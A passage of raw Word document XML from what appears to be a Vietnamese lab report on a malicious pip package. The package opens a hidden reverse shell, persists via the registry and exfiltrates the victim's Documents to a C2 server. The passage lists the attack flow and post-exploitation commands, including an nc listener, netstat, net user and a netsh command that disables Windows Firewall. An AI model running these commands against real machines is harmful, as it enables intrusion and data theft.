          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pip install safe-demo-pkg --index-url http://192.168.157.134:8000/simple/ --trusted-host 192.168.157.134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664960E2" w14:textId="6CC4CE94" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r w:rsidRPr="009C7570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5535FB6D" wp14:editId="0B9572FD">
            <wp:extent cx="5960110" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="190920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01725" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="2827020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Luồng xử lý đầy đủ sau lệnh này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816B610" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip truy vấn /simple/safe-demo-pkg/ trên pypiserver → nhận danh sách phiên bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53563D" w14:textId="5DFECA77" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip tải safe-demo-pkg-1.</w:t>
      </w:r>
      <w:r w:rsidR="00031A18">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.tar.gz về thư mục tạm AppData\Local\Temp\pip-req-build-XXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A200E25" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip import setup.py để đọc metadata → module-level growl() kích hoạt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB6CD1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>growl() spawn tiến trình Python ẩn (DETACHED + NO_WINDOW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A83C9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tiến trình ẩn: persist_registry() → ghi Registry key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393EAB95" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tiến trình ẩn: true_exfiltrate() → đọc Documents, gửi HTTP POST về Ubuntu:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34494CBF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tiến trình ẩn: reverse_shell() → kết nối về Ubuntu:4444, chờ lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11F826" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip hoàn tất cài đặt bình thường — victim không thấy bất kỳ dấu hiệu bất thường nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2612FDEC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A4182F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc227470575"/>
      <w:r>
        <w:t>A.11 — Quan sát kết quả tấn công trên máy Attacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4F40878F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Trên Ubuntu, attacker cần mở sẵn hai terminal trước khi victim chạy pip install:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799D5389" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A9FC3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal 1 — Reverse Shell (nc -lvnp 4444): </w:t>
      </w:r>
      <w:r>
        <w:t>Ngay khi pip install hoàn tất, shell kết nối về và hiển thị prompt Shell&gt;. Từ đây attacker thực thi lệnh trên Windows của victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFD261" w14:textId="04117D68" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="009C7570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E04ADD6" wp14:editId="3CCE5963">
            <wp:extent cx="5960110" cy="3738880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18381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87592" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3738880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C9574" w14:textId="1B1E68A3" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E4EE4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Sau khi victim pip install:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5732C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[+] S04 Advanced Shell Connected!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E01982" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell&gt; whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F3E61" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell&gt; ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17490B40" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell&gt; dir "C:\Users\Hong Quan\Documents"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684151F7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell&gt; dir C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A11F32" w14:textId="77777777" w:rsidR="008F741E" w:rsidRDefault="008F741E" w:rsidP="008F741E"/>
    <w:p w14:paraId="539C70A8" w14:textId="44E88773" w:rsidR="008F741E" w:rsidRDefault="008F741E" w:rsidP="008F741E">
      <w:r>
        <w:t xml:space="preserve">Giai đoạn hậu khai thác, </w:t>
      </w:r>
      <w:r w:rsidRPr="008F741E">
        <w:t>Truy tìm thông tin mạng và tắt Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26CE29" w14:textId="7F2DB8F6" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:t>Xem các kết nối mạng đang hoạt động (Reconnaissance):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338C0B4" w14:textId="50825AA3" w:rsidR="007B030B" w:rsidRPr="007B030B" w:rsidRDefault="008F741E" w:rsidP="008F741E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>netstat -ano | findstr ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D154C8" w14:textId="77777777" w:rsidR="007B030B" w:rsidRDefault="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D45ACA6" w14:textId="7C515907" w:rsidR="007B030B" w:rsidRDefault="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007B030B">
        <w:t>Terminal trả về danh sách các kết nối TCP có trạng thái ESTABLISHED, hiển thị chi tiết địa chỉ IP cục bộ, địa chỉ IP đích (remote IP), và Port đang giao tiếp, ví dụ như các kết nối đến IP 52.123.129.14:443, 20.42.65.93:443,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">…. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B030B">
        <w:t>Việc nắm được các IP đích giúp kẻ tấn công xác định được nạn nhân đang tương tác với các máy chủ nội bộ nào khác trong doanh nghiệp (Lateral Movement Reconnaissance) hoặc xác định thói quen sử dụng web của nạn nhân, từ đó làm bàn đạp cho các cuộc tấn công leo thang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31779E74" w14:textId="2E1AA648" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F861E49" wp14:editId="13B6CAB5">
            <wp:extent cx="5960110" cy="4583430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="98008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89054" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="4583430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB56AA" w14:textId="77777777" w:rsidR="007B030B" w:rsidRDefault="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046956EA" w14:textId="515BDCA4" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:t>Xem thông tin chi tiết về User và Nhóm quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC4F05" w14:textId="4C32BD9D" w:rsidR="008F741E" w:rsidRDefault="008F741E" w:rsidP="008F741E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>net user "%USERNAME%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01557F80" w14:textId="1733E127" w:rsidR="007B030B" w:rsidRDefault="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007B030B">
        <w:t>Terminal hiển thị thông tin account Hong Quan, bao gồm trạng thái hoạt động, thời điểm thay đổi mật khẩu lần cuối, và quan trọng nhất là nhóm quyền của người dùng: Local Group Memberships hiển thị *Administrators và *Users</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B030B">
        <w:t xml:space="preserve"> Đây là hành vi dò quét thông tin người dùng (User Enumeration) và kiểm tra đặc quyền (Privilege Discovery). Điều này đồng nghĩa với việc kẻ tấn công có toàn quyền kiểm soát hệ thống, có thể vô hiệu hóa phần mềm diệt virus, cài đặt rootkit, hoặc đọc các file hệ thống nhạy cảm mà không gặp trở ngại về phân quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2EF79" w14:textId="14AE6496" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13816BA4" wp14:editId="09564FE6">
            <wp:extent cx="5960110" cy="3438525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="61891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11153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3438525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B83570" w14:textId="743286B0" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:t>Thử tắt Windows Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F845BCD" w14:textId="6A8872F4" w:rsidR="008F741E" w:rsidRDefault="008F741E" w:rsidP="008F741E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall set allprofiles state off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F202FB" w14:textId="3072F2B3" w:rsidR="007B030B" w:rsidRDefault="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007B030B">
        <w:t>Kẻ tấn công sử dụng công cụ cấu hình mạng netsh của Windows để tắt toàn bộ các profile của tường lửa (Domain, Private, Public).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B030B">
        <w:t>Trên Terminal, lệnh trả về kết quả Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D11A69" w14:textId="465A0EAE" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C73CB48" wp14:editId="065919DF">
            <wp:extent cx="5960110" cy="328930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="142695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53330" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="328930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D588EA2" w14:textId="45151583" w:rsidR="007B030B" w:rsidRDefault="007B030B" w:rsidP="007B030B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007B030B">
        <w:t>Song song đó, giao diện Windows Security trên máy nạn nhân hiển thị cảnh báo đỏ, xác nhận Firewall đã bị tắt hoàn toàn cho cả 3 mạng Domain, Private và Public.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B030B">
        <w:t>Việc tắt Firewall thành công (nhờ đặc quyền Administrator đã kiểm tra ở bước trước) khiến máy nạn nhân mở toang các cổng giao tiếp. Kẻ tấn công có thể dễ dàng thiết lập thêm các kênh C2 (Command &amp; Control) phức tạp hơn, tải thêm mã độc, hoặc cho phép các máy tính khác trong mạng tự do kết nối vào máy nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666C038" w14:textId="68CD0F59" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="008F741E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD2A57F" wp14:editId="017B6EFE">
            <wp:extent cx="5960110" cy="4660265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="162128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85371" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="4660265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="229965A7" w14:textId="4EAC5471" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="008F741E">
        <w:t>Các lệnh hậu khai thác (post-exploitation) như netstat hay net user cho phép Attacker tiến hành trinh sát mạng nội bộ (Lateral Movement Reconnaissance). Thử nghiệm tắt Firewall (netsh) minh họa rủi ro khi hệ thống bị xâm nhập: nếu Victim vô tình chạy môi trường Python bằng quyền Administrator, toàn bộ hệ thống phòng thủ của máy sẽ bị vô hiệu hóa hoàn toàn từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25779F48" w14:textId="77777777" w:rsidR="008F741E" w:rsidRDefault="008F741E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8D41E2" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal 2 — C2 Exfil Server (python3 c2_server.py): </w:t>
      </w:r>
      <w:r>
        <w:t>Server lắng nghe port 8080. Khi true_exfiltrate() chạy, nội dung file .txt từ Documents của victim tự động xuất hiện trên terminal này — không cần attacker làm thêm gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48257289" w14:textId="23AEBDF0" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="009C7570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B96ABF" wp14:editId="6731B224">
            <wp:extent cx="5960110" cy="2048510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="10285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5222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="2048510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E8DE9" w14:textId="5A39DEE8" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>python3 c2_server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6EC66" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Kết quả nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7ED34" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[+] Data exfiltrated at Mon Apr 15 08:30:12 2025:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3D02A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
